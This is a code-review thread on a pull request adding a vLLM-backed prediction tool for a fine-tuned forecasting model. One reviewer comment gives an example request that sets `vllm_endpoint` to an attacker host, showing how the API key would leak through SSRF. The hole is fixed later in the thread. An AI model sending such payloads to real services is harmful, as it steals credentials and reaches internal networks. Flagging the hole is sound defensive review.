### PR TITLE
Implement a mech tool for the fine-tuned model

### PR DESCRIPTION
**Pull request by Adamantios**

### CODE REVIEW

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 1]
```diff
@@ -0,0 +1,726 @@
...
+    counter_callback: Optional[Callable[..., Any]] = kwargs.get("counter_callback")
+    if delivery_rate == 0:
+        if not counter_callback:
+            raise ValueError(
+                "A delivery rate of `0` was passed, but no counter callback was "
+                "given to calculate the max cost with."
+            )
+        return counter_callback(max_cost=True, models_calls=(model,) * N_MODEL_CALLS)
+
+    endpoint = kwargs.get(ENDPOINT_KWARG) or VLLM_ENDPOINT
```
Comment (LOCKhart07) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py]: **Requester-controllable `vllm_endpoint` leaks the `finetuned` key / SSRF.**

The tool task is invoked as `tool_task.execute(**task_data)` (`task_execution/behaviours.py:1205`), where `task_data` is the requester-supplied JSON loaded from IPFS. So `vllm_endpoint` here is attacker-controllable, e.g.:

```json
{"tool": "predict-fine-tuned", "prompt": "…", "vllm_endpoint": "http://attacker/v1"}
```

The OpenAI client then sends the configured `finetuned` bearer token (line 678) to the attacker's host — credential exfiltration — and gives an SSRF primitive into the operator's network. This directly undercuts the module's "no untrusted model input" framing: the `model` axis is locked down, but the endpoint is wide open and even documented as an override feature.

Default deployments use `DUMMY_API_KEY="EMPTY"`, so the leak is benign there — but the override is documented precisely for the "secured gateway" case, which is exactly where a real secret leaks.

Fix: source the endpoint from deployment config only (component.yaml param / env), not from request kwargs — or allowlist permitted endpoints.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 2]
```diff
@@ -0,0 +1,726 @@
...
+                max_tokens=max_tokens,
+            )
+            if response.content is not None and counter_callback is not None:
+                counter_callback(
+                    input_tokens=response.usage.prompt_tokens,
+                    output_tokens=response.usage.completion_tokens,
+                    model=model,
+                )
+            return response.content, counter_callback
+        except Exception as e:  # noqa: BLE001 — retry any transient inference error
```
Comment (LOCKhart07) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:526]: **Rate-limit key rotation is unreachable.** `with_key_rotation` (line 386) rotates keys on `openai.RateLimitError`, but this broad `except Exception` catches `RateLimitError` first, retries the *same* key, and after `COMPLETION_RETRIES` raises a plain `Exception("Failed to generate prediction after retries")`. That generic exception never matches the `except openai.RateLimitError` branch in the wrapper, so rotation can never fire for the inference path (and `gather_sources` uses `requests`, not openai, so it can't fire there either).

Either re-raise `RateLimitError` from this loop so the wrapper can rotate, or drop the rotation machinery and the docstring claim that it rotates on rate limits.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 3]
```diff
@@ -0,0 +1,726 @@
...
+        return counter_callback(max_cost=True, models_calls=(model,) * N_MODEL_CALLS)
+
+    endpoint = kwargs.get(ENDPOINT_KWARG) or VLLM_ENDPOINT
+
+    api_keys = kwargs["api_keys"]
+    llm_api_key = _optional_key(api_keys, API_KEYS_SERVICE) or DUMMY_API_KEY
+
+    prompt = kwargs["prompt"]
+    temperature = float(kwargs.get("temperature", DEFAULT_SETTINGS["temperature"]))
+    max_tokens = int(kwargs.get("max_tokens", DEFAULT_SETTINGS["max_tokens"]))
```
Comment (LOCKhart07) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:715]: **`temperature` / `max_tokens` are requester-overridable, contradicting the parity rationale.** Both are read from request kwargs (and `task_data` is requester-supplied — see the endpoint comment), yet the module docstring justifies `temperature=0.0` and the 1024-token budget as training-parity *requirements*. Beyond silently breaking parity, an unbounded requester-supplied `max_tokens` is a resource-exhaustion lever against the self-hosted vLLM. Either stop reading them from kwargs, or clamp them and document that they're intentionally tunable.

File: packages/valory/customs/finetuned_prediction/component.yaml [hunk 4]
```diff
@@ -0,0 +1,24 @@
...
+fingerprint:
+  __init__.py: bafybeid3gdbuetsikbutcl4i32avmicucmmrqmtnwn7gw454uizs5322se
+  finetuned_prediction.py: bafybeidgj62rgwpj3cyhgaqdmqnprjvfjszxgfokkskt62ifatjpr7bocm
+  tests/__init__.py: bafybeieut53j2sz53firzcldhpqeh2ca6rdopnywd7dnyzis4hvsprfs3m
+  tests/test_finetuned_prediction.py: bafybeialelvum66gvouad2g22hcjf2gphmggomkfty2porcdiqvzjqfmdi
+fingerprint_ignore_patterns: []
+entry_point: finetuned_prediction.py
+callable: run
+params:
+  default_model: ''
```
Comment (LOCKhart07) [inline packages/valory/customs/finetuned_prediction/component.yaml]: Housekeeping / metadata:

- **`tool_lineage.json` not updated.** Per CLAUDE.md "Adding a new tool from scratch", the two registered names (`predict-base`, `predict-fine-tuned`) should each get a ledger entry with `parent: null`. TOOL_REGISTRY / `tournament_tools.json` are reasonably omitted (needs a live vLLM endpoint, can't run the offline replay harness) — worth one line in the PR noting it's intentionally not benchmarked.
- **`default_model: ''`** is empty and unread (superforcaster sets a real value). This tool has two models selected by tool name; if the param is unused, drop it rather than leaving it blank.
- **PR description is empty.** For a 1100+-line new tool with substantial design rationale (two modes, training parity, vendored parser), please add a body covering the why, the two tool names, and deployment prerequisites (vLLM endpoint + serper key required).
- Nit: `COMPLETION_RETRIES=3 × COMPLETION_TIMEOUT=150s` can exceed the 240s `TASK_DEADLINE`.

**Review by LOCKhart07 — CHANGES_REQUESTED** [review]

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 5]
```diff
@@ -0,0 +1,726 @@
...
+
+
+# ---------------------------------------------------------------------------
+# Output parsing — vendored from fine_tuning reward.py (keep in sync)
+# ---------------------------------------------------------------------------
+
+# Strip the <think>...</think> block (non-greedy, multiline).
+THINK_BLOCK_RE = re.compile(r"<think>.*?</think>\s*", re.DOTALL)
+# Match a flat JSON object: from the first '{' to the first '}'.
+JSON_RE = re.compile(r"\{[^}]*\}")
```
Comment (jmoreira-valory) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:271]: **[non-blocking, but follow-up worth doing]** The vendored-parser contract is documented well ("MUST stay byte-for-byte equivalent: the reward used to train this model is computed by these exact functions, so a divergence in production parsing would silently disagree with training-time scoring") but it's only enforced by convention. If reward.py upstream changes (e.g. tightening `JSON_RE` to accept fenced code blocks, or making `parse_p_yes` more lenient on Unicode whitespace), this tool silently diverges and the model's production calibration drifts from its training reward.

Three options, increasing in effort:

1. **CI hash check**: a tiny `tests/test_parser_parity.py` that computes `hashlib.sha256` of the `JSON_RE`, `extract_json`, `parse_p_yes`, and `THINK_RE` (if present) source bytes from both repos and asserts equality. Requires `fine-tuning` as a test-time dep, but cross-repo pinning is annoying — probably a no-go.

2. **Vendored-with-version comment**: add a line at the top of the parsing block: `# Vendored from valory-xyz/fine-tuning @ <commit-sha>; re-sync on every fine-tuning parser change.` Trivially auditable from a git blame.

3. **Single source of truth**: publish the parser as a tiny `fine-tuning-parser` Python package (or a `packages/valory/customs/_parser` package mech-predict imports), and depend on it from both. Highest effort, highest correctness — and would let you add real unit-test coverage on the parser without re-implementing the test suite in each repo.

I'd lean (2) for now, with (3) on the roadmap if the parser sees real churn. (1) is brittle without a synchronized release process.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 6]
```diff
@@ -0,0 +1,726 @@
...
+    except Exception as e:  # noqa: BLE001 — fall back to the whole prompt
+        print(f"Error extracting question: {e}")
+        return prompt
+
+
+def gather_sources(question: str, serper_api_key: str) -> str:
+    """Run the question through Serper and format the top results."""
+    response = fetch_additional_sources(question, serper_api_key)
+    data = response.json()
+    organic = data.get("organic", [])[:MAX_SOURCES]
```
Comment (jmoreira-valory) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:622]: **[question]** `gather_sources()` silently returns an empty `<background>` block when Serper returns no `organic` / `peopleAlsoAsk` keys, or — via the bare `except` in the calling chain — when Serper is down entirely. The model then forecasts on zero web context, which is OOD relative to its training distribution (every training example presumably had some sources).

Two concrete questions:

1. Was the training corpus ever exposed to zero-source markets? If yes, the model has a behaviour for them and an empty `<background>` is fine. If no, this is an unmeasured OOD failure mode and a fallback may be needed (e.g., return an error or a fixed-confidence `{p_yes: 0.5, confidence: 0.0}`).

2. The Serper outage path: `fetch_additional_sources` raises → `with_key_rotation` converts to error tuple → the whole prediction fails silently with `(str(e), "", None, None, None, api_keys)`. The framework upstream knows how to interpret an error tuple, but the operator log doesn't easily distinguish "model says I don't know" from "Serper was down" from "vLLM was down". Adding one structured `log.error("Serper failed for prompt %s: %s", prompt_hash, exc)` (with prompt_hash being a sha256 prefix, not the raw prompt) would make production incident triage tractable.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 7]
```diff
@@ -0,0 +1,726 @@
...
+            )
+            if response.content is not None and counter_callback is not None:
+                counter_callback(
+                    input_tokens=response.usage.prompt_tokens,
+                    output_tokens=response.usage.completion_tokens,
+                    model=model,
+                )
+            return response.content, counter_callback
+        except Exception as e:  # noqa: BLE001 — retry any transient inference error
+            print(f"Attempt {attempt + 1} failed with error: {e}")
```
Comment (jmoreira-valory) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:527]: **[nit]** `print(f"Attempt {attempt + 1}…")` in `generate_prediction_with_retry` writes to stdout. Mech tools generally use the python `logging` module so output respects the framework's log level / structured-log adapter and goes through whatever handler the Mech runtime configured. A bare `print` shows up in stdout (depending on Mech's process supervisor it may or may not survive into logs), and crucially it can't be silenced or rate-limited if a noisy retry storm hits production.

Suggest `log.warning("Attempt %d/%d failed: %s", attempt + 1, COMPLETION_RETRIES, exc)` with a module-level logger. Cheap; matches the rest of the codebase's pattern.

**Review by jmoreira-valory — COMMENTED** [review]
Reviewed `6b2c52785d6037e9403159a493a6b60267fc9f7f` (+1147 / -0 across 6 files, including a 726-LOC main file). CI fully green across 15+ checks.

This is the production tool that wraps the LoRA-fine-tuned R1-Distill-Qwen-14B from the fine-tuning repo (PRs #28-#51 of that repo) as a mech custom tool. Calls a vLLM-served endpoint via the OpenAI-compatible chat API at temperature 0.0. Mode selection (`predict-base` / `predict-fine-tuned`) is the tool name — explicitly NOT a request parameter — so an untrusted requester can't pick which model gets called. Question is extracted from the bare prompt, Serper web search is run, results are embedded into a `<background>` block of the forecaster template, and the model is asked to emit `{p_yes, p_no, confidence, info_utility}` JSON.

What's well-done:

- **Tool-name-as-mode-selector** correctly closes the untrusted-model-input attack surface, and the threat-model rationale is in the comments (lines 101–111, 164–170).
- **Vendored parsing block** (`JSON_RE` / `extract_json` / `parse_p_yes`) keeps production parsing aligned with training-time reward (lines 251–326). The "MUST stay byte-for-byte equivalent" contract is documented explicitly (lines 57–59) — exactly the right framing.
- **Test suite** (356 LOC) is comprehensive: parse_p_yes edge cases (think-block stripping, malformed JSON, out-of-range, missing keys), `canonical_prediction` normalisation (deriving p_no, defaulting confidence/info_utility), `with_key_rotation` contract, mode-selection security (verifies requester `model` is ignored), endpoint override, unparseable-completion handling. Mocking is clean and appropriately scoped.

Three non-blocking notes inline:

- **331A** (`finetuned_prediction.py:257`): the parser-parity contract is documented but unenforced. If upstream `reward.py` changes (e.g. tightening `JSON_RE`, making `parse_p_yes` more lenient on whitespace), this tool silently diverges and production calibration drifts from training reward. Suggest a vendor-from-commit-SHA comment as the cheapest defence, with a shared `_parser` package as the correct long-term answer.
- **331B** (`finetuned_prediction.py:593`): `gather_sources` collapses to an empty `<background>` on Serper failure / missing keys, and the model then forecasts on zero web context — an OOD failure mode for a model trained on populated `<background>` blocks. Two questions: was the training corpus ever exposed to zero-source markets, and would a structured `log.error` with a prompt-hash help production incident triage distinguish Serper-down from vLLM-down from model-says-I-don't-know?
- **331C** (`finetuned_prediction.py:513`): `print` in the retry path should be `log.warning` — matches the rest of the codebase and respects the framework's log handlers.

None block. (A) is the most important follow-up because it's a future-bug-waiting-to-happen. `COMMENT`.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py (hunk 2 above)
Comment (Adamantios) [reply packages/valory/customs/finetuned_prediction/finetuned_prediction.py:526]: a) the rotation is valueless in this tool
b) this pattern is also followed in the superforcaster tool

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py (hunk 3 above)
Comment (Adamantios) [reply packages/valory/customs/finetuned_prediction/finetuned_prediction.py:715]: The user should have the freedom to update these parameters. If they end up with a worse model performance, then it's the user's responsibility.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py (hunk 7 above)
Comment (Adamantios) [reply packages/valory/customs/finetuned_prediction/finetuned_prediction.py:527]: The tools are not using a logger.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 8]
```diff
@@ -0,0 +1,750 @@
...
+
+Parsing parity
+--------------
+`extract_json` / `parse_p_yes` are vendored from
+`fine_tuning/src/fine_tuning/training/reward.py` (the single source of truth
+there). They MUST stay behaviourally equivalent — same regexes and parsing
+logic — so the reward used to train the model and the parser used to score its
+deliveries agree; otherwise production parsing silently diverges from the
+benchmark. (Only cosmetics differ here: type-hint syntax and docstrings.) If the
+upstream parser changes, mirror the change here. See the pinned commit on the
```
Comment (jmoreira-valory) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:63]: **[follow-up to 331A]** The docstring at lines 50–67 now says:

> "See the pinned commit on the parsing block below."

…but the parsing block at lines 258–265 doesn't actually pin a commit — it just repeats "Behaviourally identical to that source". The docstring is promising an enforceable anchor that isn't there.

Either:
1. Add the pin you intended: `# Vendored from valory-xyz/fine-tuning @ <40-char SHA>; re-sync on every upstream parser change.`, OR
2. Drop the "See the pinned commit on the parsing block below" line from the top docstring so it doesn't promise something that isn't there.

(1) is what closes the loop on 331A — without it, the "behaviourally equivalent" contract is still purely convention. With it, a future reader can run `git log <SHA>..HEAD -- src/fine_tuning/training/reward.py` upstream to see exactly what's drifted.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py [hunk 9]
```diff
@@ -0,0 +1,750 @@
...
+            )
+            if response.content is not None and counter_callback is not None:
+                counter_callback(
+                    input_tokens=response.usage.prompt_tokens,
+                    output_tokens=response.usage.completion_tokens,
+                    model=model,
+                )
+            return response.content, counter_callback
+        except Exception as e:  # noqa: BLE001 — retry any transient inference error
+            print(f"Attempt {attempt + 1} failed with error: {e}")
```
Comment (jmoreira-valory) [inline packages/valory/customs/finetuned_prediction/finetuned_prediction.py:527]: **[follow-up to 331C]** `refactor: no retries` reduced `COMPLETION_RETRIES` from 3 to 1, which cuts the noise potential — but the original concern wasn't about volume, it was about the `print` writing to stdout instead of the framework's logger. With `COMPLETION_RETRIES=1`, this line now runs at most once per request, but it still:

- Bypasses the module-level logger (so log level / structured-log adapter don't apply).
- Goes to stdout instead of stderr (so a Mech runtime that distinguishes them won't classify it as an error).
- Is invisible to anyone monitoring via the framework's logging handlers.

Same fix as before — `log.warning("Completion attempt failed: %s", e)` with a module-level logger. Three other `print()` calls in the file (lines 559, 572, 593) have the same property; `print(f"Error extracting question: {e}")` at 593 is the most important to convert because question-extraction failure is a real diagnostic signal you'd want to see in production logs.

**Review by jmoreira-valory — COMMENTED** [review]
Re-reviewed at `397d4bd323f89b33043101ac409aacf14979b4c2` (8 new commits since my first pass).

Status of the original findings:

- **331A** (parser-parity contract) 🟡 **partial**. The docstring softening from "byte-for-byte equivalent" → "behaviourally equivalent — same regexes and parsing logic" (with a cosmetic-differences carve-out for type hints / docstrings) is exactly the right framing. But the new line "See the pinned commit on the parsing block below" promises an anchor that doesn't actually exist at lines 258–265 (the parser block just repeats "Behaviourally identical to that source"). One-line follow-up posted (331A.2): either add the SHA pin or drop the teaser line.

- **331B** (Serper failure / silent OOD) 🟢 **fully addressed**. `gather_sources` now raises on Serper failure OR empty results, and the docstring confirms "the model was trained only on research-backed prompts" — which directly answers my original question about whether the training corpus ever saw zero-source markets. Clean closure.

- **331C** (`print` → `log.warning` in the retry path) 🔴 **not addressed**. `refactor: no retries` cut `COMPLETION_RETRIES` from 3 to 1, which reduces the noise potential, but the structural concern was about bypassing the framework's logger — not retry volume. Lines 521, 559, 572, 593 still use `print`. The one at 593 (`print(f"Error extracting question: {e}")`) is the most important to convert because question-extraction failure is a real production diagnostic signal. Follow-up posted (331C.2).

**Bonus catch from another reviewer:** the SSRF fix on `vllm_endpoint` (was requester-controllable; could leak the finetuned API key to attacker-controlled URLs). Now hardcoded constant. Significant security improvement.

No blockers. This is a recheck rather than an approve-gate; the 331A loose end and the 331C carry-over are both one-liners.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py (hunk 9 above)
Comment (Adamantios) [reply packages/valory/customs/finetuned_prediction/finetuned_prediction.py:527]: As previously said, we do not log in mech tools.

File: packages/valory/customs/finetuned_prediction/finetuned_prediction.py (hunk 8 above)
Comment (Adamantios) [reply packages/valory/customs/finetuned_prediction/finetuned_prediction.py:63]: The pin is already present (line 256, @ 5551073). You pointed to the lines 258–265 instead.

**Review by LOCKhart07 — DISMISSED** [review]
The SSRF/key-leak blocker is fixed (endpoint now a constant, with regression tests), `gather_sources` fails closed on zero context, the parser pin and `tool_lineage` entries are in, and `COMPLETION_RETRIES=1` keeps the run under the task deadline. LGTM.

One ask before merge: the PR description is empty. For a new 1240-line tool, please add a body covering the *why*, the two registered names (`predict-base` / `predict-fine-tuned`), and the deployment prerequisites (self-hosted vLLM endpoint + Serper key). Noting too that this isn't enrolled in `tournament_tools.json` / `TOOL_REGISTRY` — reasonable since the offline replay harness can't reach a live vLLM, but worth one line in the description.

**Comment by Adamantios** [comment]
/benchmark superforcaster --candidate-tool predict-base --platform polymarket --sample 100

**Comment by Adamantios** [comment]
:warning: deltas are relative % changes, not percentage-point differences

| Metric | Superforecaster (prod baseline) | Base (PR) | Δ vs baseline | Fine-tuned (PR) | Δ vs baseline | Δ base→fine-tuned |
|--------|--------------------------------:|----------:|--------------:|----------------:|--------------:|------------------:|
| Brier score | 0.2797 | 0.2587 | −7.5% | 0.2366 | −15.4% | −8.5% |
| Directional Accuracy | 62.2% | 57.6% | −7.4% | 58.7% | −5.7% | +1.9% |
| Overconf-wrong (count) | 214 | 47 | −78.0% | 8 | −96.3% | −83.0% |
| Overconf-wrong rate | 0.2140 | 0.0481 | −77.5% | 0.0080 | −96.3% | −83.4% |
| Parse rate | 99.1% (17437/17598) | 97.8% (978/1000) | −1.3pp | 100.0% (1000/1000) | +0.9pp | +2.2pp |

File: packages/valory/customs/finetuned_prediction/component.yaml [hunk 10]
```diff
@@ -0,0 +1,22 @@
+name: finetuned_prediction
+author: valory
+version: 0.1.0
+type: custom
+description: Serves the base or the fine-tuned 14B Qwen models via vLLM.
```
Comment (LOCKhart07) [inline packages/valory/customs/finetuned_prediction/component.yaml]: **Description fails the trader's `is_prediction_tool` predicate → both `predict-base` and `predict-fine-tuned` get silently dropped from candidate selection.**

```yaml
description: Serves the base or the fine-tuned 14B Qwen models via vLLM.
```

This is a pure-mechanism description — no `predict` / `forecast` / `binary` prose anywhere. Every other prediction tool in the repo leads with *"A tool for making binary predictions on markets…"*. Per `CLAUDE.md` ("Prediction tools: description must satisfy the trader's `is_prediction_tool` predicate"), this is the documented anti-pattern (describes the delta/mechanism, not the function), and a tool that fails the predicate is **silently** removed from the `ToolSelectionRound` candidate set — the policy never learns either tool. Same bug class as the precedent #284.

**TLDR:** mechanism-only description, no predictor prose → trader drops both tools and never tells you.

Fix options:
- **(preferred)** Lead with a prediction sentence, e.g. `A tool for making binary predictions on markets. Serves the base or fine-tuned 14B Qwen model via vLLM.`
- Or any phrasing that puts a plain-prose predictor sentence first (the variant detail can follow).

Either way, verify before publishing: run `explain_prediction_tool(metadata)` from a `valory-xyz/trader` clone — the verdict must be `(True, …)`.

**Review by LOCKhart07 — CHANGES_REQUESTED** [review]

File: packages/valory/customs/finetuned_prediction/component.yaml (hunk 10 above)
Comment (Adamantios) [reply packages/valory/customs/finetuned_prediction/component.yaml]: 15827c092fa4aaef4c5d629ab297b4b87d16eb2f

**Review by LOCKhart07 — APPROVED** [review]

**Review by bennyjo — APPROVED** [review]
